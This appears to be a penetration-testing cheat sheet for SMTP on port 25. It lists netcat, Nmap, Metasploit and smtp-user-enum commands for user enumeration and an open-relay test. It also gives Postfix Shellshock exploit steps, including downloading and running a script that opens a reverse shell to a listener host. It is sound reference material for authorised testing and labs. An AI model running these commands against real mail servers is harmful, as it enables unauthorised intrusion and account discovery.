SMTP 25

SMTP Banner Grabbing

Using Netcat

nc -nv <target_ip> 25

Commands to test SMTP functionality:

VRFY root
VRFY test

Using Telnet

telnet <target_ip> 25

Nmap Enumeration

Common Nmap SMTP Scripts

locate .nse | grep smtp

Run the following Nmap command:

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <target_ip>

Scan for all SMTP-related scripts:

sudo nmap --script "smtp-*" -p 25 <target_ip>

Metasploit Enumeration

Enumerate Users

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
run

Exploitation

Postfix Shellshock Vulnerability

Using SearchSploit

sudo searchsploit -m linux/remote/34896.py

Run the exploit:

python2 34896.py <target_ip>

Using the Automated Script from GitHub

Download the script:

wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py

Set permissions and execute:

sudo chmod +x postfix-shellshock-nc.py
python2 postfix-shellshock-nc.py <target_ip> <valid-email> <lhost> <lport>

Example:

python2 postfix-shellshock-nc.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234

Common Tests for Enumeration

Test for Open Relay

Manually test with Netcat or Telnet:

MAIL FROM:<test@test.com>
RCPT TO:<target@victim.com>
DATA
This is a test message.
.
QUIT

Test for VRFY Command

Use:

VRFY <username>

Test for EXPN Command

EXPN <username>

Useful Tools

Automated SMTP Enumeration Scripts

  • smtp-user-enum:

    smtp-user-enum -M VRFY -U usernames.txt -t <target_ip>

  • Metasploit for User Enumeration:

    use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
set USER_FILE usernames.txt
run
PreviousTelnet 23 - 2323NextDNS 53

Last updated